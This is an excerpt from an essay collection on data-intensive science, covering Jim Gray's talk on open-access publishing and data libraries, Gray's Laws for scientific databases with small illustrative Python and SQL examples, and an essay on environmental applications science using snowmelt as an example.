So the people who have been pioneering this movement towards open access are primarily the folks in healthcare because the good healthcare information is locked up and the bad healthcare information is on the Internet. The New Digital Library How does the new library work? Well, its free because its pretty easy to put a page or an article on the Internet. Each of you could afford to publish in PubMed Central. It would just cost you a few thousand dollars for the computerbut how much traffic you would have I dont know! But curation is not cheap. Getting the stuff into the computer, getting it cross-indexed, all that sort of stuff, is costing the National Library of Medicine about $100 to curate each article that shows up. If it takes in a million articles a year, which is approximately what it expects to get, its going to be $100 million a year just to curate the stuff. This is why we need to automate the whole curation process. What is now going on is that PubMed Central, which is the digital part of the National Library of Medicine, has made itself portable. There are versions of PubMed Central running in the UK, in Italy, in South Africa, in Japan, and in China. The one in the UK just came online last week. I guess you can appreciate, for example, that the French dont want their National Library of Medicine to be in Bethesda, Maryland, or in English. And the English dont want the text to be in American, so the UK version will probably use UK spellings for things in its Web interface. But fundamentally, you can stick a document in any of these archives and it will get replicated to all the other archives. Its fairly cheap to run one of these archives, but the big challenges are how you do curation and peer review. Overlay Journals Heres how I think it might work. This is based on the concept of overlay journals. The idea is that you have data archives and you have literature archives. The articles get deposited in the literature archives, and the data goes into the data archives. Then there is a journal management system that somebody builds that allows us, as a group, to form a journal on X. We let people submit articles to our journal by depositing them in the archive. We do peer review on them and for the ones we like, we make a title page and say, These are the articles we like and put it into xxvii the archive as well. Now, a search engine comes along and cranks up the page rank on all of those articles as being good because they are now referenced by this very significant front page. These articles, of course, can also point back to the data. Then there will be a collaboration system that comes along that allows people to annotate and comment on the journal articles. The comments are not stored in the peer reviewed archive but on the side because they have not been peer reviewed though they might be moderated. The National Library of Medicine is going to do all this for the biomedical community, but its not happening in other scientific communities. For you as members of the CSTB, the CS community could help make this happen by providing appropriate tools for the other scientific disciplines. There is some software we have created at Microsoft Research called Conference Management Tool (CMT). We have run about 300 conferences with this, and the CMT service makes it trivial for you to create a conference. 
The tool supports the whole workflow of forming a program committee, publishing a Web site, accepting manuscripts, declaring conflicts of interest and recusing yourself, doing the reviews, deciding which papers to accept, forming the conference program, notifying the authors, doing the revisions, and so on. We are now working on providing a button to deposit the articles into arXiv.org or PubMed Central and pushing in the title page as well. This now allows us to capture workshops and conferences very easily. But it will also allow you to run an online journal. This mechanism would make it very easy to create overlay journals. Somebody asked earlier if this would be hard on scholarly publishers. And the answer is yes. But isnt this also going to be hard for the IEEE and the ACM? The answer is that the professional societies are terrified that if they dont have any paper to send you, you wont join them. I think that they are going to have to deal with this somehow because I think open access is going to happen. Looking around the room, I see that most of us are old and not Generation Xers. Most of us join these organizations because we just think its part of being a professional in that field. The trouble is that Generation Xers dont join organizations. What Happens to Peer Review? This is not a question that has concerned you, but many people say, Why do we need peer review at all? Why dont we just have a wiki? And I think the answer is that peer review is different. Its very structured, its moderated, and there is a degree of confidentiality about what people say. The wiki is much more egalitarian. xxviii I think wikis make good sense for collecting comments about the literature after the paper has been published. One needs some structure like CMT provides for the peer review process. Publishing Data I had better move on and go very quickly through publishing data. Ive talked about publishing literature, but if the answer is 42, what are the units? You put some data in a file up on the Internet, but this brings us back to the problem of files. The important record to show your work in context is called the data provenance. How did you get the number 42? Here is a thought experiment. Youve done some science, and you want to publish it. How do you publish it so that others can read it and reproduce your results in a hundred years time? Mendel did this, and Darwin did this, but barely. We are now further behind than Mendel and Darwin in terms of techniques to do this. Its a mess, and weve got to work on this problem. Data, Information, and Knowledge: Ontologies and Semantics We are trying to objectify knowledge. We can help with basic things like units, and what is a measurement, who took the measurement, and when the measurement was taken. These are generic things and apply to all fields. Here [at Microsoft Research] we do computer science. What do we mean by planet, star, and galaxy? Thats astronomy. Whats the gene? Thats biology. So what are the objects, what are the attributes, and what are the methods in the object-oriented sense on these objects? And note, parenthetically, that the Internet is really turning into an objectoriented system where people fetch objects. In the business world, theyre objectifying what a customer is, what an invoice is, and so on. In the sciences, for example, we need similarly to objectify what a gene iswhich is what GenBank15 does. 
And here we need a warning that to go further, you are going to bump into the O word for ontology, the S word for schema, and controlled vocabularies. That is to say, in going down this path, youre going to start talking about semantics, which is to say, What do things mean? And of course everybody has a different opinion of what things mean, so the conversations can be endless. The best example of all of this is Entrez,16 the Life Sciences Search Engine, 15 16 xxix! So in this world, we have traditionally had authors, publishers, curators, and consumers. In the new world, individual scientists now work in collaborations, and journals are turning into Web sites for data and other details of the experiments. Curators now look after large digital archives, and about the only thing the same is the individual scientist. It is really a pretty fundamental change in the way we do science. One problem is that all projects end at a certain point and it is not clear what then happens to the data. There is data at all scales. There are anthropologists out collecting information and putting it into their notebooks. And then there are the particle physicists at the LHC. Most of the bytes are at the high end, but most of the datasets are at the low end. We are now beginning to see mashups where people take datasets from various places and glue them together to make a third dataset. So in the same sense that we need archives for journal publications, we need archives for the data. So this is my last recommendation to the CSTB: foster digital data libraries. Frankly, the NSF Digital Library effort was all about metadata for libraries and not about actual digital libraries. We should build actual digital libraries both for data and for the literature. Summary I wanted to point out that almost everything about science is changing because of the impact of information technology.. xxx Editors Note The full transcript and PowerPoint slides from Jims talk may be found at the Fourth Paradigm Web site.17 The questions and answers during the talk have been extracted from this text and are available on the Web site. (Note that the questioners have not been identified by name.) The text presented here includes minor edits to improve readability, as well as our added footnotes and references, but we believe that it remains faithful to Jims presentation. References [1] G. Bell, T. Hey, and A. Szalay, Beyond the Data Deluge, Science, vol. 323, no. 5919, pp. 12971298, 2009, doi: 10.1126/science.1170411. [2] J. Wing, Computational Thinking, Comm. ACM, vol. 49, no. 3, Mar. 2006, doi: 10.1145/1118178.1118215. [3] NSF Regional Scale Nodes,. [4] Large Hadron Collider (LHC) experiments, LHCExperiments-en.html. [5] BaBar,. [6] G. Bell, J. Gray, and A. Szalay, Petascale Computational Systems, IEEE Computer, pp. 110112, vol. 39, 2006, doi: 10.1109/MC.2006.29. 17 xxxi E A RT H A N D E N V I R O N M E N T Introduction hange is inevitablethe Universe expands, nature adapts and evolves, and so must the scientific tools and technologies that we employ to feed our unrelenting quest for greater knowledge in space, Earth, and environmental sciences. The opportunities and challenges are many. New computing technologies such as cloud computing and multicore processors cannot provide the entire solution in their generic forms. But effective and timely application of such technologies can help us significantly advance our understanding of our world, including its environmental challenges and how we might address them. 
With science moving toward being computational and data based, key technology challenges include the need to better capture, analyze, model, and visualize scientific information. The ultimate goal is to aid scientists, researchers, policymakers, and the general public in making informed decisions. As society demands action and responsiveness to growing environmental issues, new types of applications grounded in scientific research will need to move from raw discovery and eliciting basic data that leads to knowledge to informing practical decisions. Active issues such as climate change will not wait until scientists have all the data to fill their knowledge gaps. As evidenced by the articles in this part of the book, scientists are indeed actively pursuing scientific understanding through the use of new computing technologies. Szalay and Blakeley describe Jim Grays informal rules for data-centric development and how they serve as a blueprint for making large-scale datasets available through the use of databases, leveraging the built-in data management as well as the parallel processing inherent in SQL servers. In order to facilitate informed decisions based on reliable scientific evidence, Dozier and Gail explore how the applied use of technology and current scientific knowledge is key to providing tools to policy and decision makers. Hunt, Baldocchi, and van Ingen describe the changes under way in ecological science in moving from science in the small to large collaborations based on synthesis of data. These aggregated datasets expose the need for collaborative tools in the cloud as well as easy-to-use visualization and analysis tools. Delaney and Barga then provide compelling insights into the need for real-time monitoring of the complex dynamics in the sea by creating an interactive ocean laboratory. This novel cyberinfrastructure will enable new discoveries and insights through improved ocean models. The need for novel scientific browsing technologies is highlighted by Goodman and Wong. To advance the linkage across existing resources, astronomers can use a new class of visualization tools, such as the WorldWide Telescope (WWT). This new class of tool offers access to data and information not only to professional scientists but also the general public, both for education and possibly to enable new discoveries by anyone with access to the Internet. Finally, Lehning et al. provide details about the use of densely deployed real-time sensors combined with visualization for increased understanding of environmental dynamicslike a virtual telescope looking back at the Earth. These applications illustrate how scientists and technologists have the opportunity to embrace and involve citizen scientists in their efforts. In Part 1 and throughout the book, we see new sensors and infrastructures enabling real-time access to potentially enormous quantities of data, but with experimental repeatability through the use of workflows. Service-oriented architectures are helping to mitigate the transition to new underlying technologies and enable the linkage of data and resources. This rapidly evolving process is the only mechanism we have to deal with the data deluge arising from our instruments. The question before us is how the worlds intellectual and technological resources can be best orchestrated to authoritatively guide our responses to current and future societal challenges. The articles that follow provide some great answers. E A RT H A N D E N V I R O N M E N T Ale xander S. 
EARTH AND ENVIRONMENT

Alexander S. Szalay, The Johns Hopkins University
José A. Blakeley, Microsoft

The explosion in scientific data has created a major challenge for cutting-edge scientific projects. With datasets growing beyond a few tens of terabytes, scientists have no off-the-shelf solutions that they can readily use to manage and analyze the data [1]. Successful projects to date have deployed various combinations of flat files and databases [2]. However, most of these solutions have been tailored to specific projects and would not be easy to generalize or scale to the next generation of experiments. Also, today's computer architectures are increasingly imbalanced; the latency gap between multi-core CPUs and mechanical hard disks is growing every year, making the challenges of data-intensive computing harder to overcome [3]. What is needed is a systematic and general approach to these problems with an architecture that can scale into the future.

Gray's Laws

Jim Gray formulated several informal rules, or laws, that codify how to approach data engineering challenges related to large-scale scientific datasets. The laws are as follows:

1. Scientific computing is becoming increasingly data intensive.
2. The solution is in a scale-out architecture.
3. Bring computations to the data, rather than data to the computations.
4. Start the design with the 20 queries.
5. Go from working to working.

It is important to realize that the analysis of observational datasets is severely limited by the relatively low I/O performance of most of today's computing platforms. High-performance numerical simulations are also increasingly feeling the I/O bottleneck. Once datasets exceed the random access memory (RAM) capacity of the system, locality in a multi-tiered cache no longer helps [4]. Yet very few high-end platforms provide a fast enough I/O subsystem.

High-performance, scalable numerical computation also presents an algorithmic challenge. Traditional numerical analysis packages have been designed to operate on datasets that fit in RAM. To tackle analyses that are orders of magnitude larger, these packages must be redesigned to work in a multi-phase, divide-and-conquer manner while maintaining their numerical accuracy. This suggests an approach in which a large-scale problem is decomposed into smaller pieces that can be solved in RAM, while the rest of the dataset resides on disk. This approach is analogous to the way in which database algorithms such as sorts or joins work on datasets larger than RAM.

These challenges are reaching a critical stage. Buying larger network storage systems and attaching them to clusters of compute nodes will not solve the problem because network/interconnect speeds are not growing fast enough to cope with the yearly doubling of the necessary storage. Scale-out solutions advocate simple building blocks in which the data is partitioned among nodes with locally attached storage [5]. The smaller and simpler these blocks are, the better the balance between CPUs, disks, and networking can become. Gray envisaged simple "CyberBricks" where each disk drive has its own CPU and networking [6]. While the number of nodes on such a system would be much larger than in a traditional scale-up architecture, the simplicity and lower cost of each node and the aggregate performance would more than make up for the added complexity. With the emergence of solid-state disks and low-power motherboards, we are on the verge of being able to build such systems [7].
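The multi-phase, divide-and-conquer pattern described above is easy to sketch. The fragment below is only an illustration of the idea, not code from any of the projects discussed in this article; the file name and single-column layout are invented. It streams a dataset that is too large for RAM in bounded chunks, the way an external-memory sort or join touches one partition at a time, and accumulates a mean and variance as it goes.

# Streaming (out-of-core) mean and variance over a file too large for RAM.
# "measurements.csv", with one numeric value per line, is hypothetical.

def chunked_lines(path, chunk_size=1_000_000):
    """Yield lists of at most chunk_size lines so memory use stays bounded."""
    with open(path) as f:
        chunk = []
        for line in f:
            chunk.append(line)
            if len(chunk) == chunk_size:
                yield chunk
                chunk = []
        if chunk:
            yield chunk

def streaming_mean_variance(path):
    n, total, total_sq = 0, 0.0, 0.0
    for chunk in chunked_lines(path):
        values = [float(line) for line in chunk]   # one in-RAM partition at a time
        n += len(values)
        total += sum(values)
        total_sq += sum(v * v for v in values)
    mean = total / n
    # Simple sum-of-squares form for clarity; a production version would use
    # a numerically stabler update.
    return mean, total_sq / n - mean * mean

if __name__ == "__main__":
    print(streaming_mean_variance("measurements.csv"))

The point of the sketch is the control flow: only one partition is ever resident in memory, which is exactly the behavior a scale-out node with locally attached storage needs.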
Database-centric Computing

Most scientific data analyses are performed in hierarchical steps. During the first pass, a subset of the data is extracted by either filtering on certain attributes (e.g., removing erroneous data) or extracting a vertical subset of the columns. In the next step, data are usually transformed or aggregated in some way. Of course, in more complex datasets, these patterns are often accompanied by complex joins among multiple datasets, such as external calibrations or extracting and analyzing different parts of a gene sequence [8]. As datasets grow ever larger, the most efficient way to perform most of these computations is clearly to move the analysis functions as close to the data as possible. It also turns out that most of these patterns are easily expressed by a set-oriented, declarative language whose execution can benefit enormously from cost-based query optimization, automatic parallelism, and indexes.

Gray and his collaborators have shown on several projects that existing relational database technologies can be successfully applied in this context [9]. There are also seamless ways to integrate complex class libraries written in procedural languages as an extension of the underlying database engine [10, 11].

MapReduce has become a popular distributed data analysis and computing paradigm in recent years [12]. The principles behind this paradigm resemble the distributed grouping and aggregation capabilities that have existed in parallel relational database systems for some time. New-generation parallel database systems such as Teradata, Aster Data, and Vertica have rebranded these capabilities as "MapReduce in the database." New benchmarks comparing the merits of each approach have been developed [13].

Connecting to the Scientists

One of the most challenging problems in designing scientific databases is to establish effective communication between the builder of the database and the domain scientists interested in the analysis. Most projects make the mistake of trying to be everything for everyone. It is clear that some features are more important than others and that various design trade-offs are necessary, resulting in performance trade-offs.

Jim Gray came up with the heuristic rule of "20 queries." On each project he was involved with, he asked for the 20 most important questions the researchers wanted the data system to answer. He said that five questions are not enough to see a broader pattern, and a hundred questions would result in a shortage of focus [14]. The "20 queries" rule is a moniker for a design step that engages the domain scientist and the database engineer in a conversation that helps bridge the semantic gap between nouns and verbs used in the scientific domain and the entities and relationships stored in the database. Queries define the precise set of questions in terms of entities and relationships that domain scientists expect to pose to the database. At the end of a full iteration of this exercise, the domain scientist and the database engineer speak a common language. This approach has been very successful in keeping the design process focused on the most important features the system must support, while at the same time helping the domain scientists understand the database system trade-offs, thereby limiting feature creep.
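To make the design step concrete, here is a hypothetical illustration of how one of a project's "20 queries" might be captured. It is not an actual query from any Gray project; the table and column names are invented, and a real archive would use a proper spherical-distance predicate rather than a simple declination band. The scientist's question ("which catalog objects brighter than magnitude 20 lie within a degree of a given declination?") is restated as a set-oriented SQL statement issued from Python, leaving index selection and parallelism to the database engine.

import sqlite3

# Hypothetical schema: photo_objects(obj_id, ra, dec, magnitude).
QUERY = """
SELECT obj_id, ra, dec, magnitude
FROM   photo_objects
WHERE  magnitude < 20.0
  AND  dec BETWEEN :dec0 - 1.0 AND :dec0 + 1.0
ORDER BY magnitude;
"""

def bright_objects_near(db_path, dec0):
    """Return bright objects within one degree of declination dec0."""
    with sqlite3.connect(db_path) as conn:
        return conn.execute(QUERY, {"dec0": dec0}).fetchall()

if __name__ == "__main__":
    for row in bright_objects_near("survey.db", dec0=-5.0):
        print(row)

Writing the question declaratively like this is what lets the engine, rather than the scientist, decide how to use indexes and partitions to answer it.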
Another design law is to move from working version to working version. Gray was very much aware of how quickly data-driven computing architecture changes, especially if it involves distributed data. New distributed computing paradigms come and go every other year, making it extremely difficult to engage in a multi-year top-down design and implementation cycle. By the time such a project is completed, the starting premises have become obsolete. If we build a system that starts working only if every one of its components functions correctly, we will never finish. The only way to survive and make progress in such a world is to build modular systems in which individual components can be replaced as the underlying technologies evolve. Today's service-oriented architectures are good examples of this. Web services have already gone through several major evolutionary stages, and the end is nowhere in sight.

From Terascale to Petascale Scientific Databases

By using Microsoft SQL Server, we have successfully tackled several projects on a scale from a few terabytes (TB) to tens of terabytes [15-17]. Implementing databases that will soon exceed 100 TB also looks rather straightforward [18], but it is not entirely clear how science will cross the petascale barrier.

As databases become larger and larger, they will inevitably start using an increasingly scaled-out architecture. Data will be heavily partitioned, making distributed, non-local queries and distributed joins increasingly difficult. For most of the petascale problems today, a simple data-crawling strategy over massively scaled-out, shared-nothing data partitions has been adequate (MapReduce, Hadoop, etc.). But it is also clear that this layout is very suboptimal when a good index might provide better performance by orders of magnitude. Joins between tables of very different cardinalities have been notoriously difficult to use with these crawlers. Databases have many things to offer in terms of more efficient plans.

We also need to rethink the utility of expecting a monolithic result set. One can imagine crawlers over heavily partitioned databases implementing a construct that can provide results one bucket at a time, resulting in easier checkpointing and recovery in the middle of an extensive query. This approach is also useful for aggregate functions with a clause that would stop when the result is estimated to be within, for example, 99% accuracy. These simple enhancements would go a long way toward sidestepping huge monolithic queries, breaking them up into smaller, more manageable ones.

Cloud computing is another recently emerging paradigm. It offers obvious advantages, such as co-locating data with computations and an economy of scale in hosting the services. While these platforms obviously perform very well for their current intended use in search engines or elastic hosting of commercial Web sites, their role in scientific computing is yet to be clarified. In some scientific analysis scenarios, the data needs to be close to the experiment. In other cases, the nodes need to be tightly integrated with very low latency. In yet other cases, very high I/O bandwidth is required. Each of these analysis strategies would be suboptimal in current virtualization environments. Certainly, more specialized data clouds are bound to emerge soon. In the next few years, we will see whether scientific computing moves from universities to commercial service providers or whether it is necessary for the largest scientific data stores to be aggregated into one.
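The bucket-at-a-time crawling and early-stopping aggregation suggested above can be mocked up in a few lines. The sketch only illustrates the control flow; the partition layout is hypothetical, and the mapping of "99% accuracy" to a 1% relative-error target at roughly 95% confidence is an assumption made for the example, not a prescription from any existing system.

import math
import random

def approximate_mean(partitions, relative_error=0.01, confidence_z=1.96):
    """Crawl shared-nothing partitions one bucket at a time and stop early
    once the running mean is estimated to be within the requested relative
    error at roughly 95% confidence."""
    n, total, total_sq = 0, 0.0, 0.0
    for bucket in partitions:                 # one partition per iteration
        for v in bucket:
            n += 1
            total += v
            total_sq += v * v
        mean = total / n
        var = max(total_sq / n - mean * mean, 0.0)
        stderr = math.sqrt(var / n)
        if n > 1 and mean != 0 and confidence_z * stderr / abs(mean) < relative_error:
            return mean, n                    # early stop: estimate is good enough
    return total / n, n

if __name__ == "__main__":
    random.seed(0)
    # Hypothetical data: 100 partitions of 10,000 noisy measurements each.
    parts = ([random.gauss(42.0, 5.0) for _ in range(10_000)] for _ in range(100))
    print(approximate_mean(parts))

Run on the synthetic partitions above, the crawl stops after the first bucket because the estimate is already tight enough, which is exactly the saving such a clause would buy on a petascale store.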
Conclusions

Experimental science is generating vast volumes of data. The Pan-STARRS project will capture 2.5 petabytes (PB) of data each year when in production [18]. The Large Hadron Collider will generate 50 to 100 PB of data each year, with about 20 PB of that data stored and processed on a worldwide federation of national grids linking 100,000 CPUs [19]. Yet generic data-centric solutions to cope with this volume of data and corresponding analyses are not readily available [20].

Scientists and scientific institutions need a template and collection of best practices that lead to balanced hardware architectures and corresponding software to deal with these volumes of data. This would reduce the need to reinvent the wheel. Database features such as declarative, set-oriented languages and automatic parallelism, which have been successful in building large-scale scientific applications, are clearly needed. We believe that the current wave of databases can manage at least another order of magnitude in scale. So for the time being, we can continue to work. However, it is time to start thinking about the next wave.

Scientific databases are an early predictor of requirements that will be needed by conventional corporate applications; therefore, investments in these applications will lead to technologies that will be broadly applicable in a few years. Today's science challenges are good representatives of the data management challenges for the 21st century. Gray's Laws represent an excellent set of guiding principles for designing the data-intensive systems of the future.

References

[1] A. S. Szalay and J. Gray, Science in an Exponential World, Nature, vol. 440, pp. 23-24, 2006, doi: 10.1038/440413a.
[2] J. Becla and D. Wang, Lessons Learned from Managing a Petabyte, CIDR 2005 Conference, Asilomar, 2005, doi: 10.2172/839755.
[3] G. Bell, J. Gray, and A. Szalay, Petascale Computational Systems: Balanced CyberInfrastructure in a Data-Centric World, IEEE Computer, vol. 39, pp. 110-112, 2006, doi: 10.1109/MC.2006.29.
[4] W. W. Hsu and A. J. Smith, Characteristics of I/O traffic in personal computer and server workloads, IBM Sys. J., vol. 42, pp. 347-358, 2003, doi: 10.1147/sj.422.0347.
[5] A. Szalay, G. Bell, et al., GrayWulf: Scalable Clustered Architecture for Data Intensive Computing, Proc. HICSS-42 Conference, Hawaii, 2009, doi: 10.1109/HICSS.2009.750.
[6] J. Gray, Cyberbricks Talk at DEC/NT Wizards Conference, 2004; T. Barclay, W. Chong, and J. Gray, TerraServer Bricks: A High Availability Cluster Alternative, Microsoft Technical Report MSR-TR-2004-107, Cyberbrick.ppt.
[7] A. S. Szalay, G. Bell, A. Terzis, A. S. White, and J. Vandenberg, Low Power Amdahl Blades for Data-Intensive Computing.
[8] U. Roehm and J. A. Blakeley, Data Management for High-Throughput Genomics, Proc. CIDR, 2009.
[9] J. Gray, D. T. Liu, M. A. Nieto-Santisteban, A. S. Szalay, G. Heber, and D. DeWitt, Scientific Data Management in the Coming Decade, ACM SIGMOD Record, vol. 34, no. 4, pp. 35-41, 2005; also MSR-TR-2005-10, doi: 10.1145/1107499.1107503.
[10] A. Acheson et al., Hosting the .NET Runtime in Microsoft SQL Server, ACM SIGMOD Conf., 2004, doi: 10.1145/1007568.1007669.
[11] J. A. Blakeley, M. Henaire, C. Kleinerman, I. Kunen, A. Prout, B. Richards, and V. Rao, .NET Database Programmability and Extensibility in Microsoft SQL Server, ACM SIGMOD Conf., 2008, doi: 10.1145/1376616.1376725.
[12] J. Dean and S. Ghemawat, MapReduce: Simplified Data Processing on Large Clusters, OSDI, 2004, doi: 10.1145/1327452.1327492.
[13] A. Pavlo et al., A Comparison of Approaches to Large-Scale Data Analysis, ACM SIGMOD Conf., 2009, doi: 10.1145/1559845.1559865.
[14] C. Anderson, The Long Tail. New York: Random House, 2007.
[15] A. R. Thakar, A. S. Szalay, P. Z. Kunszt, and J. Gray, The Sloan Digital Sky Survey Science Archive: Migrating a Multi-Terabyte Astronomical Archive from Object to Relational DBMS, Comp. Sci. and Eng., vol. 5, no. 5, pp. 16-29, Sept. 2003.
[16] A. Terzis, R. Musaloiu-E., J. Cogan, K. Szlavecz, A. Szalay, J. Gray, S. Ozer, M. Liang, J. Gupchup, and R. Burns, Wireless Sensor Networks for Soil Science, Int. J. Sensor Networks, to be published 2009.
[17] Y. Li, E. Perlman, M. Wan, Y. Yang, C. Meneveau, R. Burns, S. Chen, A. Szalay, and G. Eyink, A public turbulence database cluster and applications to study Lagrangian evolution of velocity increments in turbulence, J. Turbul., vol. 9, no. 31, pp. 1-29, 2008, doi: 10.1080/14685240802376389.
[18] Pan-STARRS: Panoramic Survey Telescope and Rapid Response System.
[19] A. M. Parker, Understanding the Universe, in Towards 2020 Science, Microsoft Corporation, 2006.
[20] G. Bell, T. Hey, and A. Szalay, Beyond the Data Deluge, Science, vol. 323, no. 5919, pp. 1297-1298, 2009, doi: 10.1126/science.1170411.

EARTH AND ENVIRONMENT

The science of earth and environment has matured through two major phases and is entering a third. In the first phase, which ended two decades ago, Earth and environmental science was largely discipline oriented and focused on developing knowledge in geology, atmospheric chemistry, ecosystems, and other aspects of the Earth system. In the 1980s, the scientific community recognized the close coupling of these disciplines and began to study them as interacting elements of a single system. During this second phase, the paradigm of Earth system science emerged. With it came the ability to understand complex, system-oriented phenomena such as climate change, which links concepts from atmospheric sciences, biology, and human behavior. Essential to the study of Earth's interacting systems was the ability to acquire, manage, and make available data from satellite observations; in parallel, new models were developed to express our growing understanding of the complex processes in the dynamic Earth system [1].

In the emerging third phase, knowledge developed primarily for the purpose of scientific understanding is being complemented by knowledge created to target practical decisions and action. This new knowledge endeavor can be referred to as the science of environmental applications. Climate change provides the most prominent example of the importance of this shift. Until now, the climate science community has focused on critical questions involving basic knowledge, from measuring the amount of change to determining the causes. With the basic understanding now well established, the demand for climate applications knowledge is emerging. How do we quantify and monitor total forest biomass so that carbon markets can characterize supply? What are the implications of regional shifts in water resources for demographic trends, agricultural output, and energy production? To what extent will seawalls and other adaptations to rising sea level impact coasts? These questions are informed by basic science, but they raise additional issues that can be addressed only by a new science discipline focused specifically on applications, a discipline that integrates physical, biogeochemical, engineering, and human processes.
Its principal questions reflect a fundamental curiosity about the nature of the world we live in, tempered by the awareness that a question's importance scales with its relevance to a societal imperative. As Nobel laureate and U.S. Secretary of Energy Steven Chu has remarked, "We seek solutions. We don't seek (dare I say this?) just scientific papers anymore" [2].

To illustrate the relationships between basic science and applications, consider the role of snowmelt runoff in water supplies. Worldwide, 1 billion people depend on snow or glacier melt for their water resources [3]. Design and operations of water systems have traditionally relied on historical measurements in a stationary climate, along with empirical relationships and models. As climates and land use change, populations grow and relocate, and our built systems age and decay, these empirical methods of managing our water become inaccurate, a conundrum characterized as "stationarity is dead" [4]. Snowmelt commonly provides water for competing uses: urban and agricultural supply, hydropower, recreation, and ecosystems. In many areas, both rainfall and snowfall occur, raising the concern that a future warmer climate will lead to a greater fraction of precipitation as rain, with the water arriving months before agricultural demand peaks and with more rapid runoff leading to more floods. In these mixed rain and snow systems, the societal need is: How do we sustain flood control and the benefits that water provides to humans and ecosystems when changes in the timing and magnitude of runoff are likely to render existing infrastructure inadequate?

The solution to the societal need requires a more fundamental, process-based understanding of the water cycle. Currently, historical data drive practices and decisions for flood control and water supply systems. Flood operations and reservoir flood capacity are predetermined by regulatory orders that are static, regardless of the type of water year, current state of the snowpack, or risk of flood. In many years, early snowmelt is not stored because statistically based projections anticipate floods that better information might suggest cannot materialize because of the absence of snow. The more we experience warming, the more frequently this occurrence will impact the water supply [5].

The related science challenges are: (1) The statistical methods in use do not try to estimate the basin's water balance, and with the current measurement networks, even in the U.S., we lack adequate knowledge of the amount of snow in the basins; (2) We are unable to partition the input between rain and snow, or to partition that rain or snow between evapotranspiration and runoff; (3) We lack the knowledge to manage the relationship between snow cover, forests, and carbon stocks; (4) Runoff forecasts that are not based on physical principles relating to snowmelt are often inaccurate; and (5) We do not know what incentives and institutional arrangements would lead to better management of the watershed for ecosystem services. Generally, models do not consider these kinds of interactions; hence the need for a science of environmental applications.

Its core characteristics differentiate it from the basic science of Earth and environment:

Need driven versus curiosity driven. Basic science is question driven; in contrast, the new applications science is guided more by societal needs than scientific curiosity.
Rather than seeking answers to questions, it focuses on creating the ability to seek courses of action and determine their consequences.

Externally constrained. External circumstances often dictate when and how applications knowledge is needed. The creation of carbon trading markets will not wait until we fully quantify forest carbon content. It will happen on a schedule dictated by policy and economics. Construction and repair of the urban water infrastructure will not wait for an understanding of evolving rainfall patterns. Applications science must be prepared to inform actions subject to these external drivers, not according to academic schedules based on when and how the best knowledge can be obtained.

Consequential and recursive. Actions arising from our knowledge of the Earth often change the Earth, creating the need for new knowledge about what we have changed. For example, the more we knew in the past about locations of fish populations, the more the populations were overfished; our original knowledge about them became rapidly outdated through our own actions. Applications science seeks to understand not just those aspects of the Earth addressed by a particular use scenario, but also the consequences and externalities that result from that use scenario. A recent example is the shift of agricultural land to corn-for-ethanol production, an effort to reduce climate change that we now recognize as significantly stressing scarce water resources.

Useful even when incomplete. As the snowpack example illustrates, actions are often needed despite incomplete data or partial knowledge. The difficulty of establishing confidence in the quality of our knowledge is particularly disconcerting given the loss of stationarity associated with climate change. New means of making effective use of partial knowledge must be developed, including robust inference engines and statistical interpretation.

Scalable. Basic science knowledge does not always scale to support applications needs. The example of carbon trading presents an excellent illustration. Basic science tells us how to relate carbon content to measurements of vegetation type and density, but it does not give us the tools that scale this to a global inventory. New knowledge tools must be built to accurately create and update this inventory through cost-effective remote sensing or other means.

Robust. The decision makers who apply applications knowledge typically have limited comprehension of how the knowledge was developed and in what situations it is applicable. To avoid misuse, the knowledge must be characterized in highly robust terms. It must be stable over time and insensitive to individual interpretations, changing context, and special conditions.

Data intensive. Basic science is data intensive in its own right, but data sources that support basic science are often insufficient to support applications. Localized impacts with global extent, such as intrusion of invasive species, are often difficult for centralized projects with small numbers of researchers to ascertain. New applications-appropriate sources must be identified, and new ways of observing (including the use of communities as data gatherers) must be developed.

Each of these characteristics implies development of new knowledge types and new tools for acquiring that knowledge. The snowpack example illustrates what this requirement means for a specific application area.
Four elements have recently come together that make deployment of a measurement and information system that can support decisions at the scale of a large river basin feasible: (1) accurate, sustained satellite estimates of snow-covered area across an entire mountain range; (2) reliable, low-cost sensors and telemetry systems for snow and soil moisture; (3) social science data that complement natural and engineered systems data to enable analysis of human decision making; and (4) cyberinfrastructure advances to integrate data and deliver them in near real time.

For snow-dominated drainage basins, the highest-priority scientific challenge is to estimate the spatial distribution and heterogeneity of the snow water equivalent, i.e., the amount of water that would result if the snow were to melt. Because of wind redistribution of snow after it falls, snow on the ground is far more heterogeneous than rainfall, with several meters of difference within a 10 to 100 m distance. Heterogeneity in snow depth smooths the daily runoff because of the variability of the duration of meltwater in the snowpack [6]; seasonally, it produces quasi-riparian zones of increased soil moisture well into the summer.

The approach to estimating the snow water equivalent involves several tasks using improved data: (1) extensive validation of the satellite estimates of snow cover and its reflectivity, as Figure 1 shows; (2) using results from an energy balance reconstruction of snow cover to improve interpolation from more extensive ground measurements and satellite data [7]; (3) development of innovative ways to characterize heterogeneity [8]; and (4) testing the interpolated estimates with a spatially distributed runoff model [9]. The measurements would also help clarify the accuracy of precipitation estimates from regional climate models.

FIGURE 1. An illustration of the type of data that are useful in analyzing the snow cover. The left panel shows elevations of the Sierra Nevada and Central Valley of California, along with a portion of northwestern Nevada (longitudes roughly 122W to 118W). The middle panel shows the raw satellite data in three spectral bands (0.841-0.876, 0.545-0.565, and 0.459-0.479 µm) from NASA's Moderate Resolution Imaging Spectroradiometer (MODIS), which provides daily global data at 250 to 1000 m resolution in 36 spectral bands. From seven land bands at 500 m resolution, we derive the fractional snow-covered area, i.e., the fraction of each 500 m grid cell covered by snow, shown in the right panel [10].

This third phase of Earth and environmental science will evolve over the next decade as the scientific community begins to pursue it. Weather science has already built substantial capability in applications science; the larger field of Earth science will need to learn from and extend those efforts. The need for basic science and further discovery will not diminish, but instead will be augmented and extended by this new phase. The questions to address are both practically important and intellectually captivating. Will our hydrologic forecasting skill decline as changes in precipitation diminish the value of statistics obtained from historic patterns? Where will the next big climate change issue arise, and what policy actions taken today could allow us to anticipate it?

Equally important is improving how we apply this knowledge in our daily lives. The Internet and mobile telephones, with their global reach, provide new ways to disseminate information rapidly and widely. Information was available to avoid much of the devastation from the Asian tsunami and Hurricane Katrina, but we lacked the tools for rapid decision making and communication of needed actions.
